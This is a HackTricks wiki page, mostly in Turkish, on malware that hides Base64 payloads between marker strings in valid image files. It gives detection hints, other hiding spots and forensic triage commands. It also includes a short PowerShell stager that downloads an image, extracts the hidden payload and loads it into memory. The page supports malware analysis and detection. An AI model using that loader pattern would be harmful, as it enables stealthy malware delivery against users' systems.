Malware & Network Stego

Tip

AWS Hacking’i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking’i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE) Azure Hacking’i öğrenin ve pratik yapın: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks'i Destekleyin

• abonelik planlarını kontrol edin!
• 💬 Discord grubuna veya telegram grubuna katılın ya da Twitter’da bizi takip edin 🐦 @hacktricks_live.**
• Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.

Tüm steganography pixel LSB değildir; commodity malware genellikle payloads’ı başka türlü geçerli dosyaların içine gizler.

Pratik kalıplar

Geçerli görüntülerde marker ile sınırlandırılmış payloads

Bir görüntü indirildiğinde ve hemen bir script tarafından text/Base64 olarak parse edildiğinde, payload genellikle pixel-hidden yerine marker ile sınırlandırılmış olur.

Commodity loaders giderek artan şekilde Base64 payloads’ı düz metin olarak başka türlü geçerli görüntülerin içine (genellikle GIF/PNG) gizler. Pixel-level LSB yerine, payload dosya metnine/metadata’sına gömülmüş benzersiz marker string’lerle sınırlandırılır. Bir stager ardından:

• Downloads the image over HTTP(S)
• Locates start/end markers
• Extracts the between-text and Base64-decodes it
• Loads/executes in-memory

Minimal PowerShell carving snippet:

$img = (New-Object Net.WebClient).DownloadString('https://example.com/p.gif')
$start = '<<sudo_png>>'; $end = '<<sudo_odt>>'
$s = $img.IndexOf($start); $e = $img.IndexOf($end)
if($s -ge 0 -and $e -gt $s){
$b64 = $img.Substring($s + $start.Length, $e - ($s + $start.Length))
$bytes = [Convert]::FromBase64String($b64)
[Reflection.Assembly]::Load($bytes) | Out-Null
}

Notlar:

• ATT&CK: T1027.003 (steganography)
• Tespit/avcılık:
• İndirilen görüntüleri ayırıcı dizeler için tara.
• Görüntü çeken ve hemen Base64 decode rutinlerini çağıran scriptleri işaretle (PowerShell FromBase64String, JS atob, vb.).
• HTTP content-type uyuşmazlıklarına bak (image/* yanıtı ama body uzun ASCII/Base64 içeriyor).

Other high-signal places to hide payloads

Bunlar genellikle içerik-seviyesindeki piksel stego’dan daha hızlı kontrol edilir:

• Meta veriler: EXIF/XMP/IPTC, PNG tEXt/iTXt/zTXt, JPEG COM/APPn segments.
• Trailing bytes: resmi bitiş işaretinden sonra eklenen veri (ör., PNG IEND sonrası).
• Gömülü arşivler: loader tarafından gömülmüş veya eklenmiş ve çıkarılan bir ZIP/7z.
• Polyglots: birden fazla parser altında geçerli olacak şekilde hazırlanmış dosyalar (ör., image + script + archive).

Triage komutları

file sample
exiftool -a -u -g1 sample
strings -n 8 sample | head
binwalk sample
binwalk -e sample

Referanslar:

• Unit 42 örneği: https://unit42.paloaltonetworks.com/phantomvai-loader-delivers-infostealers/
• MITRE ATT&CK: https://attack.mitre.org/techniques/T1027/003/
• File format polyglots and container tricks: https://github.com/corkami/docs
• Aperi’Solve (web-based stego triage): https://aperisolve.com/

Tip

AWS Hacking’i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking’i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE) Azure Hacking’i öğrenin ve pratik yapın: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks'i Destekleyin

• abonelik planlarını kontrol edin!
• 💬 Discord grubuna veya telegram grubuna katılın ya da Twitter’da bizi takip edin 🐦 @hacktricks_live.**
• Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.